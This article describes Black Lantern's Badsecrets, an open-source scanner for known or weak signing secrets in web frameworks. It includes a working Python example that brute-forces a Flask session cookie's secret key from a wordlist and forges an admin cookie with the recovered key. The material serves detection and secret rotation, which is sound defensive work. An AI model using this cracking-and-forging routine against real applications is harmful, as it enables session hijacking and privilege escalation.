This week, cybersecurity company Black Lantern announced Badsecrets, an open source tool designed to help identify known or weak cryptographic secrets across various web frameworks. The library is written in Python and has a modular design, offering ten modules meant to replace existing tools for finding secrets. Badsecrets is inspired by Blacklist3r, a project from NotSoSecure for locating secret keys related to publicly available web frameworks.
The goal of Badsecrets is to expand on the supported platforms and remove language and operating system dependencies. Currently, the modules support scanning for Flask cookie signing passwords, bad/weak signing passwords in Peoplesoft PS_TOKEN, ASP.NET machine keys, and secret keys in Telerik UI, Django session cookies, Ruby on Rails signed or encrypted session cookies, JSON Web Tokens, the Mojarra and MyFaces implementations of Java Server Faces (JSF), and Symfony '_fragment' URLs.
Black Lantern notes that Badsecrets is designed to identify known secrets that could be exploited for remote code execution (RCE) or privilege escalation, but does not help address these issues. What a found secret buys an attacker depends on the framework: in every case it allows forging data the application trusts because it is signed (a session cookie, a token, a ViewState blob), and where the framework then deserializes that data, forged input can become code execution. The firm notes that exploitation of the identified misconfigurations can sometimes be straightforward, and in other cases might require more work or chaining with other vulnerabilities.
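To make concrete what a "known secret" check means for one of the targets listed above, here is an added example (not Badsecrets' own code) that re-implements Flask's session cookie signing in stdlib Python and tests a captured cookie against a candidate wordlist. It assumes Flask's default scheme, which is the itsdangerous URLSafeTimedSerializer with salt "cookie-session", HMAC-SHA1 and "hmac" key derivation; the wordlist and the sample session are constructed for the example.

```python
"""Added example: test a Flask session cookie against candidate SECRET_KEY
values, the way a known-secret scanner does.  Stand-alone stdlib
re-implementation of the itsdangerous signing scheme Flask uses by default
(salt "cookie-session", HMAC-SHA1, "hmac" key derivation).  Not Badsecrets'
own code; the wordlist below is a constructed placeholder."""
import base64
import hashlib
import hmac
import json
import time
import zlib

SALT = b"cookie-session"  # Flask's default session salt


def _b64(data: bytes) -> str:
    # itsdangerous uses URL-safe base64 with the "=" padding stripped
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _derive_key(secret: bytes) -> bytes:
    # "hmac" key derivation: the signing key is HMAC-SHA1(secret, salt)
    return hmac.new(secret, SALT, hashlib.sha1).digest()


def _sign(secret: bytes, value: bytes) -> str:
    return _b64(hmac.new(_derive_key(secret), value, hashlib.sha1).digest())


def make_flask_cookie(session: dict, secret: str, timestamp=None) -> str:
    """Build a cookie exactly as Flask would: payload.timestamp.signature."""
    payload = json.dumps(session, separators=(",", ":"), sort_keys=True).encode()
    compressed = zlib.compress(payload)
    if len(compressed) < len(payload) - 1:
        body = "." + _b64(compressed)  # leading "." marks a zlib-compressed payload
    else:
        body = _b64(payload)
    ts = timestamp if timestamp is not None else int(time.time())
    ts_bytes = ts.to_bytes((ts.bit_length() + 7) // 8 or 1, "big")
    value = f"{body}.{_b64(ts_bytes)}"
    return f"{value}.{_sign(secret.encode(), value.encode())}"


def find_flask_secret(cookie: str, candidates):
    """Return the candidate secret that validates the cookie, or None."""
    value, _, sig = cookie.rpartition(".")  # everything before the last "." is signed
    if not value or not sig:
        return None
    for cand in candidates:
        if hmac.compare_digest(_sign(cand.encode(), value.encode()), sig):
            return cand
    return None


# Constructed wordlist of placeholder secrets; a real scanner ships a far longer one.
KNOWN_SECRETS = ["changeme", "CHANGEME", "secret", "dev", "password", "flask",
                 "CHANGE_ME_TO_SOMETHING_SECURE"]

if __name__ == "__main__":
    # Constructed sample: an app that shipped with SECRET_KEY = "changeme".
    captured = make_flask_cookie({"user": "guest"}, "changeme", timestamp=1700000000)
    hit = find_flask_secret(captured, KNOWN_SECRETS)
    print("captured cookie:", captured)
    print("matching secret:", hit)
    if hit:
        # Once the key is known, any session the app trusts can be forged.
        print("forged admin cookie:", make_flask_cookie({"user": "admin"}, hit))
```

The scanner only needs the cookie, never the application, because the signature is deterministic in the secret; that is why each Badsecrets module is essentially a format parser plus a signing routine run across a wordlist. The forging step at the end is the privilege-escalation case from the text; an RCE case would need a framework that deserializes the signed blob, which Flask's JSON session does not.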
The cybersecurity firm hopes that Badsecrets will become the standard for identifying such vulnerabilities and encourages the community to grow the available modules to cover additional web frameworks and utilities.
In conclusion, Badsecrets is a modular, open source Python library with ten modules for finding known or weak cryptographic secrets across web frameworks. It does not fix the vulnerabilities it finds, but it lets developers and testers identify them so the secret can be rotated and the underlying misconfiguration addressed. Black Lantern encourages the community to contribute modules covering more web frameworks and utilities.
Key Points:
- Black Lantern’s Badsecrets is an open source tool designed to help identify known or weak cryptographic secrets
- The library has a modular design and is offering ten modules meant to replace existing tools for finding secrets
- Badsecrets is not meant to address the identified vulnerabilities, but instead can help identify them in order to allow the developer to address the issue
- The cybersecurity firm encourages the community to contribute to the library in order to expand its available modules to cover more web frameworks and utilities